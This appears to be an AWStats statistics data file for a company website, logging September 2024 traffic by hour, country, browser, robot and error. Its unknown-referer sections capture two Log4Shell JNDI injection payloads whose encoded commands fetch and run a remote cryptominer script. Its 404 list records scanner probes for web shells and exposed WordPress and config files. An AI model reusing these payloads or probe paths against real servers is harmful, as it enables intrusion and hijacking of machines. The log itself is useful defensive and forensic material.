AWSTATS DATA FILE 7.8 (build 20200416)
# If you remove this file, all statistics for date 202409 will be lost/reset.
# Last config file used to build this data file was /home/z1h9uk8mq9i3/tmp/awstats/awstats.proditelsas.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2016                
POS_TIME 2698                
POS_VISITOR 34482               
POS_DAY 56483               
POS_DOMAIN 3587                
POS_LOGIN 4550                
POS_ROBOT 4705                
POS_WORMS 5475                
POS_EMAILSENDER 5606                
POS_EMAILRECEIVER 5749                
POS_SESSION 57340               
POS_SIDER 57551               
POS_FILETYPES 5884                
POS_DOWNLOADS 6182                
POS_OS 6389                
POS_BROWSER 6733                
POS_SCREENSIZE 9107                
POS_UNKNOWNREFERER 9181                
POS_UNKNOWNREFERERBROWSER 10649               
POS_ORIGIN 11637               
POS_SEREFERRALS 11784               
POS_PAGEREFS 12021               
POS_SEARCHWORDS 13255               
POS_KEYWORDS 13448               
POS_MISC 2362                
POS_ERRORS 13550               
POS_CLUSTER 4406                
POS_SIDER_404 13719               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20241001002224 255 60248 15919203794385
FirstTime 20240901001613
LastTime 20240930225237
LastUpdate 20241001061109 255 0 254 0 0
TotalVisits 713                 
TotalUnique 549                 
MonthHostsKnown 0                   
MonthHostsUnknown 571                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
AddToFavourites 0 0 0
PDFSupport 0 0 0
JavascriptDisabled 0 0 0
WindowsMediaPlayerSupport 0 0 0
RealPlayerSupport 0 0 0
QuickTimeSupport 0 0 0
TotalMisc 0 0 0
JavaEnabled 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 45 73 4796251 58 80 301465
1 54 82 4919857 83 116 419183
2 36 50 2450295 110 132 109843
3 33 63 8873401 50 101 360222
4 40 41 118931 78 91 85684
5 51 97 20228765 56 90 1292766
6 122 182 11510305 599 642 480027
7 73 285 36914199 104 180 948286
8 38 171 41535649 76 132 4601275
9 63 187 27745817 41 73 518394
10 87 143 18426571 84 115 157790
11 53 111 14154765 93 168 5127167
12 115 216 18431316 86 139 720991
13 105 225 22924027 86 124 821164
14 46 108 9772426 141 215 764417
15 98 259 20006043 100 143 1065178
16 62 76 2611396 110 158 504668
17 51 122 20553765 147 184 223833
18 42 42 115937 137 165 234645
19 79 140 18967884 52 84 177362
20 25 39 2365830 84 135 336911
21 49 63 2536079 92 123 356748
22 45 61 349586 48 75 302887
23 40 54 2484903 40 62 136089
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 52
us 453 579 34992735
ar 237 577 61897598
co 156 921 177309498
in 71 71 101493
ru 69 84 3166104
cn 63 69 717466
tr 52 52 42068
de 46 60 2373959
jp 34 37 186976
ro 28 28 174589
it 19 19 240863
ca 19 47 428755
bg 18 18 306684
fr 15 15 102728
br 15 24 358040
es 13 55 6865657
at 13 13 184869
il 12 12 30886
se 10 10 37742
gb 10 10 33510
nc 9 9 24741
hn 6 6 17656
ua 6 6 81572
sa 6 6 81572
nl 6 6 18009
gr 3 3 21302
ps 4 4 10996
ng 4 19 6476188
pe 1 15 2281920
kh 1 1 3916
lt 1 1 2749
nz 2 2 5498
no 2 2 8528
ao 5 5 13745
ee 4 4 12158
ie 2 2 5498
mn 3 3 2427
ir 2 2 5498
pl 4 4 3236
eu 2 2 5498
pt 1 15 2281920
mx 1 1 809
bd 1 15 2281920
ec 0 1 491746
bo 5 36 8822551
ch 3 3 40786
ma 2 2 7336
sc 4 4 10996
md 2 2 5498
be 2 2 1618
au 2 3 202639
am 3 3 11252
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 16
Googlebot/ 666 4726435 20240930212407 0
AhrefsBot/ 201 1955957 20240930140343 0
bingbot/ 123 2262994 20240930073216 0
Go\-http\-client/ 79 134775 20240930125234 4
Applebot/ 21 118370 20240928170416 0
SemrushBot/ 15 57709 20240930131527 0
bot[\s_+:,\.\;\/\\-] 7 1161573 20240918022148 0
no_user_agent 7 119266 20240927130259 0
curl 6 12949 20240927150506 0
facebookexternalhit/ 4 68152 20240919070243 0
(firefox/)([0-9]\.|[0-1][0]\.) 4 12792 20240916080628 0
Googlebot\-Image/ 3 621793 20240921012251 0
YandexBot/ 3 6429 20240930235042 0
libwww\-perl 2 34076 20240921171017 0
link 1 1576 20240916093340 0
BLEXBot/ 1 4264 20240914004938 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 12
woff 3 130716 0 0
php 1005 3615532 0 0
html 375 2352764 0 0
gif 45 20334 0 0
css 224 353502 0 0
Unknown 64 114803 0 0
png 285 134080080 0 0
staff 4 144 0 0
queue 1 1465 0 0
jpg 450 164580348 0 0
pdf 11 2948500 0 0
js 423 4595810 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 5
/atencion.pdf 6 0 1111614
/disponibilidad.pdf 5 0 930802
/ficha%20tecnica.pdf 3 0 1338272
/contrato.pdf 3 0 1248338
/Decreto%201524%20de%202002.pdf 2 0 573900
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 20
linuxubuntu 37 37
linux 111 110
win8.1 25 11
ios_iphone 209 98
win8 3 3
macosx7 3 3
win7 24 20
linuxdebian 1 1
winlong 9 9
android 22 7
macosx15 88 15
android10 329 52
Unknown 121 106
win10 1761 855
winnt 11 9
winxp 4 4
win2003 2 2
androidnougat 10 4
macosx9 1 1
macosx 119 105
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 113
safari17.1.2 1 1
chrome95.0.4638.69 4 4
netscape5.0 17 17
chrome96.0.4664.45 1 1
chrome59.0.3071.125 8 2
chrome89.0.4389.114 15 15
chrome71.0.2623.112 2 2
chrome109.0.0.0 18 4
chrome78.0.2135 1 1
chrome124.0.0.0 32 28
chrome80.0.3987.149 6 6
firefox63.0 7 7
opera89.0.4447.51 40 40
chrome20.0.1132.11 1 1
chrome122.0.0.0 4 4
chrome124.0.6367.60 3 3
firefox121.0 1 1
chrome115.0.0.0 1 1
chrome100.0.1315 1 0
chrome74.0.3729.169 20 20
chrome55.0.443 1 0
safari16.6.1 6 1
chrome129.0.0.0 284 33
chrome58.0.1145.75 9 9
chrome17.0.963.56 3 3
chrome124.0.6367.119 6 6
chrome60.0.3112.90 3 3
chrome113.0.0.0 6 6
chrome68.0.1307 1 1
safari13.0.3 86 82
msie8.0 2 2
chrome33.0.1750.146 1 1
firefox115.0 10 10
chrome66.0.3359.117 4 4
chrome128.0.0.0 645 80
chrome125.0.6422.142 15 1
msie11.0 1 1
firefox125.0 1 1
chrome116.0.0.0 15 1
Unknown 73 73
firefox42.0 1 1
chrome100.0.4896.60 2 2
chrome121.0.0.0 4 4
chrome52.0.1435 1 0
chrome78.0.3904.62 2 2
safari15.4 10 10
chrome117.0.0.0 3 3
firefox100.0 1 1
firefox111.0 1 1
chrome124.0.6367.91 8 7
chrome108.0.0.0 31 16
chrome124.0.6367.78 3 3
safari 43 6
chrome121.0.6167.160 1 1
chrome55.0.3056.57 1 1
chrome120.0.0.0 34 19
chrome124.0.6367.61 12 12
firefox101.0 21 7
chrome114.0.0.0 223 223
chrome78.0.2263 15 1
chrome79.0.3945.88 3 3
firefox130.0 45 3
opera112.0.0.0 486 267
chrome103.0.0.0 2 2
chrome91.0.4472.114 21 9
iphone 15 1
chrome60.0.3112.113 67 67
chrome101.0.4951.67 1 0
chrome88.0.4324.190 3 3
chrome44.0.2403.157 1 1
chrome105.0.0.0 2 2
chrome53.0.3053.99 1 1
chrome96.0.327 1 1
chrome50.0.3025.106 1 1
opera113.0.0.0 11 6
chrome75.0.1444 1 1
safari16.1 21 4
chrome83.0.4103.7 6 6
chrome80.0.3987.162 1 1
chrome98.0.4758.80 1 1
chrome94.0.4606.61 9 9
edge44 4 4
firefox129.0 30 2
chrome124.0.6367.62 6 6
chrome125.0.0.0 21 21
firefox88.0 3 3
chrome112.0.0.0 3 3
chrome127.0.0.0 56 5
chrome124.0.6367.93 4 4
chrome128.0.6613.137 1 0
safari18.0 10 1
firefox89.0 1 1
firefox119.0 16 2
msie9.0 1 1
firefox52.0 1 1
edge18 1 1
firefox26.0 3 3
chrome66.0.3359.181 3 3
mozilla 32 18
chrome126.0.0.0 21 21
chrome60.0.3112.107 2 2
chrome107.0.0.0 1 0
chrome96.0.4664.110 3 3
chrome63.0.3239.84 1 1
chrome124.0.6367.63 8 8
safari15.1 1 1
firefox114.0 104 104
safari17.6 33 3
firefox123 1 1
chrome69.0.440 1 1
chrome78.0.3904.108 37 37
chrome49.0.2623.112 6 2
chrome106.0.0.0 4 4
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 12
Mozilla/5.0_AppleWebKit/537.36_(KHTML,_like_Gecko;_compatible;_GoogleOther)_Chrome/128.0.6613.137_Safari/537.36 20240930114806
python-requests/2.27.1 20240925182422
Mozilla/5.0_(compatible;_InternetMeasurement/1.0;__https://internet-measurement.com/) 20240926082827
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//57.128.29.86:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0OTlhNkxNdmFtV2N1cW5XN3dtTWg1aWZMMVZTejljM1lRcDJQY2JBREZQNGFyNmFkNWV2UFZSZXdCZkZxSEhQTlhXNG9yVmVBVTFyYVV6TWVWZkJRWjN0VHA4S1pMSg==}') 20240912191459
Mozilla/5.0_(compatible;_Dataprovider.com) 20240912011012
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//89.34.230.11:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuNHRoZXBvb2wubG9sL3NldHVwXzR0aGVwb29sX21pbmVyLnNoIHwgTENfQUxMPWVuX1VTLlVURi04IGJhc2ggLXMgNDk5YTZMTXZhbVdjdXFuVzd3bU1oNWlmTDFWU3o5YzNZUXAyUGNiQURGUDRhcjZhZDVldlBWUmV3QmZGcUhIUE5YVzRvclZlQVUxcmFVek1lVmZCUVozdFRwOEtaTEo=}') 20240922025337
Mozilla/5.0_(compatible;_Odin;_https://docs.getodin.com/) 20240907145921
Mozilla/5.0_(compatible;_ips-agent) 20240912013301
Mozilla/5.0 20240929144350
python-requests/2.32.3 20240928225608
python-requests/2.12.4 20240926063100
Mozilla/5.0_zgrab/0.x 20240914173214
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 5
python-requests/2.12.4 20240926063100
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//89.34.230.11:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuNHRoZXBvb2wubG9sL3NldHVwXzR0aGVwb29sX21pbmVyLnNoIHwgTENfQUxMPWVuX1VTLlVURi04IGJhc2ggLXMgNDk5YTZMTXZhbVdjdXFuVzd3bU1oNWlmTDFWU3o5YzNZUXAyUGNiQURGUDRhcjZhZDVldlBWUmV3QmZGcUhIUE5YVzRvclZlQVUxcmFVek1lVmZCUVozdFRwOEtaTEo=}') 20240922025337
python-requests/2.27.1 20240925182422
python-requests/2.32.3 20240928225608
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//57.128.29.86:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0OTlhNkxNdmFtV2N1cW5XN3dtTWg1aWZMMVZTejljM1lRcDJQY2JBREZQNGFyNmFkNWV2UFZSZXdCZkZxSEhQTlhXNG9yVmVBVTFyYVV6TWVWZkJRWjN0VHA4S1pMSg==}') 20240912191459
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 582 622
From1 12 12
From2 66 68
From3 153 153
From4 639 2035
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 5
ecosia 1 1
www_google_com 57 59
bing_com_catchall 2 2
www_google_com_co 1 1
www_bing_com 5 5
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 25
http://181.225.72.214:8080 82 82
http://181.225.72.214:8080/actuator/gateway/routes 18 18
http://181.225.72.214:8080/js/NewWindow_2_all.js 8 8
http://181.225.72.214:8080/login 4 4
https://l.wl.co 3 3
http://181.225.72.214:8080/cgi-bin/authLogin.cgi 3 3
http://181.225.72.214:8080/favicon.ico 3 3
http://181.225.72.214:8080/owncloud/status.php 2 2
http://181.225.72.214:8080/webfig/ 2 2
http://181.225.72.214:8080/WebInterface/ 2 2
http://181.225.72.214:8080/console 2 2
http://181.225.72.214:8080/c/ 2 2
http://181.119.64.134:8080 2 2
http://181.225.72.214:8080/api/session/properties 2 2
http://181.225.72.214:8080/Telerik.Web.UI.WebResource.axd 2 2
http://181.225.72.214:8080/scada-vis 2 2
http://181.225.72.214:8080/status.php 2 2
http://181.119.64.134:8080/autodiscover/autodiscover.json 2 2
http://181.225.72.214:8080/static/historypage.js 2 2
http://181.225.72.214:8080/showLogin.cc 2 2
http://181.225.72.214:8080/zabbix/favicon.ico 2 2
http://181.225.72.214:8080 1 1
http://181.225.72.214:8080/robots.txt 1 1
http://181.225.72.214:8080/sitemap.xml 1 1
http://m.facebook.com 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 1
http+//www.proditelsas.com/medidor.php 3
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 2
//www.proditelsas.com/medidor.php 3
http 3
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 8
301 12 2913
206 6 8274600
404 1748 0
302 273 1008
400 2 56
422 167 468429
201 11 879
101 3 0
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 736
/wp-admin/includes/inc.php.suspected.1524379932 1 -
/wp-admin/images/wp-signup.php 1 -
/cobertura/ficha%20tecnica.pdf 2 -
/wp-includes/IXR/index.php 3 -
/wp-content/plugins/hello.php 1 -
/media/system/js/core.js 3 -
/config.php 1 -
/wp-includes/ID3/license.txt 9 -
/assets/expect.php 1 -
/wp-add.php 10 -
/class.api.php 1 -
/wso.php 2 -
/vaogqsds.php 1 www.google.com
/2020/wp-includes/wlwmanifest.xml 13 -
/comida/factores.php 1 -
/wp-content/plugins/seoplugins/mar.php 2 -
/security.txt 1 -
/bay.php 1 -
/cgi-bin/cgi-bin/ws.php 1 -
/sitio 1 -
/.well-known/pki-validation/admin.php 2 -
/bak.php 1 -
/home.php 3 -
/.well-known/acme-challenge/admin.php 1 -
/wp-content/themes/digital-download/new.php 1 -
/wp-admin/includes/index.php 2 -
/css/about.php7 1 -
/wp-content/plugins/wpcall-button/button-image.php 3 -
/wp-admin/about.php 2 -
/wp-includes/block-patterns/themes.php 1 -
/up.php 3 -
/copypaths.php 1 -
/wp-includes/Text/Diff/Renderer/index.php 1 -
/f.php 1 -
/readme.php 1 -
/alfa-rex.php56 1 -
/mainpage/wp-content/plugins/fix/up.php 1 -
/sites/default/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php 1 -
/test/wp-admin/install.php 1 -
/.well-knownold/index.php 2 -
/wp-admin.php 2 -
/chosen.php 4 -
/wp-admin/file.php 1 -
/.well-known/pki-validation/wp-config.php 1 -
/wp-admin/ajax-actions.php 1 -
/Www 1 -
/htaccess.php 1 -
/backup 17 -
/backup/ 7 -
/wp-admin/js/about.php 2 -
/wp-content/plugins/shell/noimg.php 3 -
/defense.php 1 -
/click.php 1 -
/.DS_Store 1 -
/pqr/control.php 1 -
/C.php 1 -
/pvqrognt.php 1 -
/mah.php 2 -
/sito/wp-includes/wlwmanifest.xml 8 -
/wp-content/plugins/google-seo-rank/module.php 1 -
/.well-known/about.php 1 -
/cgi-bin/themes.php 2 -
/cms/wp-includes/wlwmanifest.xml 16 -
/okaoka.php 1 -
/adminLite/jQuery-File-Upload/server/php/index.php 1 -
/ini.php 1 -
/misc/ajax.js 1 -
/wp-pano.php 1 -
/ccx/index.php 1 -
/wp-includes/Text/Diff/Engine.php 1 -
/defaults.php 1 -
/images/options.php 1 -
/wp-content/plugins/press/wp-class.php 1 -
/plugins.php 2 -
/wp-content/plugins/phpadmin/autoload_classmap.php 2 -
/assets/global/plugins/jquery-file-upload/server/php/index.php 1 -
/system.php 1 -
/wp-admin/css/colors/blue/blkafewl.php 1 -
/chosen 1 -
/wp-content/plugins/give/assets/dist/images/visa.svg 1 -
/theme/assets/upload_image.php 1 -
/wp-content/mah.php 1 -
/wp-load.php 1 -
/wp-admin/css/colors/blue/ 1 -
/inputs.php 1 -
/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php 1 -
/payment.php 1 -
/wp-includes/radio.php 1 -
/.well-known/class.api.php 1 -
/new/wp-admin/install.php 1 -
/ndex.php 1 -
/test/ 7 -
/wp-admin/user/network.php 1 -
/2019/wp-includes/wlwmanifest.xml 15 -
/wp-content/plugins/give/readme.txt 1 -
/wp-HbJxZ2.php 1 -
/wp-content/themes/admin.php 1 -
/wp-admin/images/index.php 6 -
/.well-known/pki-validation/parx.php 1 -
/sad/about.php 1 -
/suspencion.php 49 http://181.225.72.214:8080/
/shop/wp-admin/install.php 1 -
/credits.php 1 -
/old 17 -
/wp-atom.php 1 -
/ioxi-rex3.php7 1 -
/wp-includes/Requests/Text/admin.php 1 -
/cgi-bin/wp-login.php 1 -
/wp-login.php 60 HTTP://PRODITELSAS.COM/wp-login.php
/sitemap.xml 5 -
/.well-known/options.php 1 -
/wp-cXjq2.php 1 -
/sites/all/modules/contrib/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php 1 -
/wp-includes/css/core.php 1 -
/include/Lurd.class.php 1 -
/wp-admin/wp-admin.php 1 -
/cjfuns.php 1 -
/admin/uploads/worksec.php 1 -
/assets/images/ups.php 1 -
/autoload_classmap.php 2 -
/good.php 1 -
/reservas/informacion_crc.php 1 -
//vendor/phpunit/phpunit/phpunit.xsd 2 -
/s.php 1 -
/.well-known/pki-validation/bb.php 1 -
/ads.txt 2 -
/wp-content/sxx.php 1 -
/new/ 7 -
/wp-includes/SimplePie/gzdecodes.php.suspected 1 -
/public/assets/upload_image.php 1 -
/css/index.php 1 -
/chart/php-ofc-library/ofc_upload_image.php 1 -
/wp-includes/fonts/index.php 1 -
/upload.php 1 -
/wp-content/plugins/seoo/wsoyanz.php 1 -
/wp-includes/wp-login.php 2 -
/fileupload/server/php/index.php 1 -
/shell.php 1 -
/ALFA_DATA/autoload_classmap.php 1 -
/wp-admin/css/colors/coffee/index.php 1 -
/wp-admin/css/colors/coffee/cloud.php 1 -
/bac 1 -
/wp-admin/network/wp-login.php 1 -
/wp-admin/admin-ajax.php 2 -
/ 2 -
/sxx.php 1 -
/WP 1 -
/wso112233.php 1 -
/license.php 1 -
/backup/wp-admin/install.php 1 -
/wp-includes/Text/Diff/index.php 1 -
/tiny.php 2 -
/ticket/vendor/htmlawed/htmlawed/gel4y.php 1 -
/wp-admin/install.php 1 -
/Wp 1 -
/wp-includes/wp-activate.php 1 -
/wp-content/plugins/core/include.php 1 -
/wp-content/plugins/WordPressCore/include.php 2 -
/crack_self_restore.php 1 -
/wp-sigunq.php 1 -
/goods.php 1 -
/goat.php 1 -
/about/function.php 1 -
/old-site 1 -
/wp-content/themes/twentytwentytwo/index.php 1 -
/WordPress 1 -
/sitemap.xml.gz 2 -
/rgcoqcmw.php 1 -
/wp-includes/images/smilies/about.php 1 -
/wp-info.php 2 -
/assets/fileupload/server/php/index.php 2 -
/uploads/ynz.PhP7 1 -
/version.php 1 -
/blog/wp-admin/install.php 1 -
/editor.php 1 -
/wp-content/themes/extol/settings.php 1 -
/wp-content/upgrade-temp-backup/about.php 1 -
/wp-includes/js/jquery/jquery-migrate.min.js 3 -
/blog 1 -
/bc 17 -
/wp-admin/js/eZTJWZuq.php 1 -
/docs/cc.php 1 -
/wp-includes/repeater.php 1 -
/.well-known/acme-challenge/worksec.php 1 -
/wp-includes/Requests/network.php 1 -
/wp-mail.php 1 -
/wp-p.php7 1 -
/wp-content/themes.php 2 -
/wp-l0gin.php 1 -
/wp-admin/maint/upfile.php 1 -
/test 1 -
/wp-content/batm.php 1 -
/link.php 2 -
/web.php 1 -
/shop/wp-includes/wlwmanifest.xml 15 -
/wp/wp-includes/wlwmanifest.xml 15 -
/site 1 -
/.vscode/ftp-sync.json 1 -
/user.php 2 -
/css.php 2 -
/files/index.php 1 -
/wp-includes/images/wp-login.php 1 -
/gallery 1 -
/wp-includes/js/tinymce/plugins/compat3x/css/index.php 1 -
/lv.php 1 -
/c.php 2 -
/wp-config.php 1 -
/bypass.php 2 -
/bk 17 -
/images/about.php 1 -
/wp1/wp-includes/wlwmanifest.xml 15 -
/load.php 1 -
/2018 1 -
/admin/editor3/src/elrte.src.html 1 -
/sitemap.txt 2 -
/wp-content/install.php 1 -
/01.php 1 -
/ftp-sync.json 1 -
/wp-includes/assets/index.php 1 -
/Blog 1 -
/2018/wp-includes/wlwmanifest.xml 2 -
/wp-content/plugins/dummyyummy/wp-signup.php 3 -
/fr/priv8.php 1 -
/site/wp-admin/install.php 1 -
/lock.php 2 -
/geju.php 1 -
/oldsite 1 -
/wp-includes/js/index.php 1 -
/default.php 1 -
/WORDPRESS 1 -
/NEW 1 -
/ee.php 1 -
/sidwsi.PhP7 1 -
/inc.php 1 -
/as.php 2 -
/wp-content/plugins/pwnd/pwnd.php/ 1 -
/wp-content/tmpls.php 1 -
/cobertura/corporativo.php 1 -
/wp-admin/users.php 1 -
/gecko.php 1 -
/wp-old 1 -
/install.php 2 -
/data.php 1 -
/m.php 2 -
/cpvcigyk.php 1 -
/shop 1 -
/02.php 1 -
/scajbkbp.php 1 -
/wp-includes/bak.php 1 -
/wp-includes/customize/about.php 2 -
/wp-content/db-cache.php 1 -
/files/dropdown.php 1 -
/wp-content/json.php 1 -
/wp-includes/Text/about.php 2 -
/ALFA_DATA/alfacgiapi/perl.alfa 2 www.google.com
/BLOG 1 -
/wp-admin/404.php 1 -
/a.php 1 -
/2021 1 -
/wordpress 17 -
/wp-content/plugins/init-help/init.php 2 -
/.well-known/acme-challenge/gif.php 1 -
/humans.txt 1 -
/wp-content/themes/hideo/network.php 1 -
/goxzilnz.php 1 -
/xmlrpc.php 17 -
/.well-known/classwithtostring.php 1 -
/assets/admin/plugins/ckeditor/elfinder/php/connector.php 1 -
/wp-admin/autoload_classmap.php 1 -
/old/ 7 -
/assets/library.php 1 -
/wp2/wp-includes/wlwmanifest.xml 8 -
/wp-admin/user/xmrlpc.php 1 -
/wp-includes/ID3/rk2.php 1 -
/eplzpmzn.php 1 -
/wp-admin/css/colors/file.php 1 -
/wp-content/plugins/phpad/acp.php 6 -
/manager.php 1 -
/ckeditor/elfinder/php/connector.php 1 -
/Backup 1 -
/about/function.php/shell.php/readme.php/text.php 1 -
/wp-content/uploads/2020/08/home-image-4.jpg 2 -
/13.php 2 -
/wp-admin/maint/index.php 5 -
/blog/ 7 -
/wp-includes/system_log.php 1 -
/aspera/faspex/ 1 -
/.well-known/pki-validation/index.php 3 -
/administrator/index.php 1 -
/.well-known/radio.php 2 -
/nowp.php 1 -
/wp-admin/images/admin.php 1 -
/alfacgiapi/perl.alfa 2 www.google.com
/xt/index.php 1 -
/new 17 -
/vendor/bin/loader.php 1 -
/.well-known/makeasmtp.php 1 -
/wp-includes/js/jquery/jquery.js 1 -
/wp-content/plugins/not/includes/about.php 2 -
/aks.php 1 -
/admin/controller/extension/extension/ 2 binance.com
/wp-includes/hnkmhdbj.php 1 -
/admin/php-ofc-library/ofc_upload_image.php 1 -
/wp-content/plugins/pwnd-1/pwnd.php 4 -
/robots.txt 199 -
/wp-content/repeater.php 1 -
/sftp-config.json 4 -
/wp-includes/style-engine/about.php 3 -
/posm//wp-content/themes/seotheme/db.php 1 -
/options.php 1 -
/admin/plugins/file-uploader/server/php/index.php 1 -
/website/wp-includes/wlwmanifest.xml 7 -
/log.php 2 -
/.well-known/ 3 -
/wp-includes/customize/class-wp-customize-new-menu-section-compiler.php 1 -
/wso.PHP 1 -
/wp-includes.bak/html-api/about.php 1 -
/wp-content/plugins/pwnd/pwnd.php 8 -
/wp-admin/user/about.php 1 -
/wp-admin/css/colors/coffee/themes.php 1 -
/Images/about.php 1 -
/alfa-rex.php 1 -
/assets/index.php 1 -
/wp-content/plugins/clara/clara.php 1 -
/864axcqt.php 1 -
/x/index.php 1 -
/cache.php 1 -
/SITE 1 -
/wp-content/file.php 1 -
/wp-content/plugins/wpsml-sys.php 1 -
/wp-content/plugins/wp-swamp/wp-swamp.php 1 -
/wp-admin/dropdown.php 2 -
/admin/assets/upload_image.php 1 -
/wp-admin/css/colors/modern/yZChe.php 1 -
/wp-includes/SimplePie/index.php 2 -
/b.php 1 -
/wp-config-sample.php 2 -
/.well-known/default.php 1 -
/qapplzty.php 1 -
/.well-known/pki-validation/file.php 1 -
/wp-content/plugins/simple/simple.php 4 www.google.com
/wp/wp-admin/install.php 1 -
/.well-known/acme-challenge/plugins.php 1 -
/wp-includes/fonts/about.php 1 -
/administrator/language/en-GB/en-GB.xml 3 -
/.well-known/acme-challenge/index.php 4 -
/wp-admin/cloud.php 1 -
/.ftp-sync.json 1 -
/wp-content/uploads/upload_handler.php 1 -
/uploads/ 2 binance.com
/pqr/disponibilidad.pdf 1 -
/lrmawrtx.php 1 www.google.com
/cobertura/contactenos.php 1 -
/blogs/wp-login.php 1 -
/wp-admin/css/colors/blue/xmrlpc.php 2 -
/wp-content/uploads/index.php 3 -
/radio.php 1 -
/a 1 -
/wp-includes/SimplePie/network.php 1 -
/wp-content/plugins/dropdown.php 1 -
/wp-content/themes/seotheme/mar.php 1 -
/wp-includes/pomo/wp-login.php 1 -
/504.php 1 -
/wp-admin/network/wp-term.php 1 -
/w.php 1 -
/.well-known/acme-challenge/cloud.php 2 -
/wp-admin/network/xmrlpc.php 1 -
/wp-admin/images/about.php 2 -
/assets/upload_image.php 1 -
/admin/upload/css.php 1 -
/wp-content/plugins/jquery-html5-file-upload/readme.txt 1 -
/wp-includes/sitemaps/providers/index.php 1 -
/dfpbtqbc.php 1 -
/.well-known/acme-challenge/file.php 1 -
/.well-known/bxjdihkz.php 1 -
/test/wp-includes/wlwmanifest.xml 15 -
/site/wp-login.php 1 -
/blog/index.php 1 -
/customize.php 1 -
/.sftp-config.json 1 -
/rorykqqh.php 1 -
/wp-content/index.php 3 -
/wp-includes/ID3/themes.php 1 -
/wp-includes/widgets/index.php 2 -
/alfa1.php 1 -
/cloud.php 1 -
/upfile.php 1 -
/glpi/vendor/network.php 1 -
/janxbqzr.php 1 -
/ws.php 2 -
/insoamv.php 1 -
/wp-includes/product.php 1 -
/home 16 -
/shell20211028.php 2 -
/hehehehe.php 9 -
/.well-known/pki-validation/moon.php 1 -
/wp-content/plugins/jupiterx-core/includes/parse-css/vendors/prestashop/php-css-parser/tests/files/1readme.css 1 -
/.well-known/pki-validation/about.php 1 -
/wp-includes/html-api/about.php 1 -
/temp/ 7 -
/wp-content/dropdown.php 1 -
/www 1 -
/images/ 2 binance.com
/license.txt 1 -
/images/xmrlpc.php 1 -
/wp-includes/mah.php 1 -
/BACKUP 1 -
/wp-content/plugins/sderfgt 1 -
/reservas/procedimientos.php 1 -
/jp.php 2 -
/wp-includes/css/admin.php 1 -
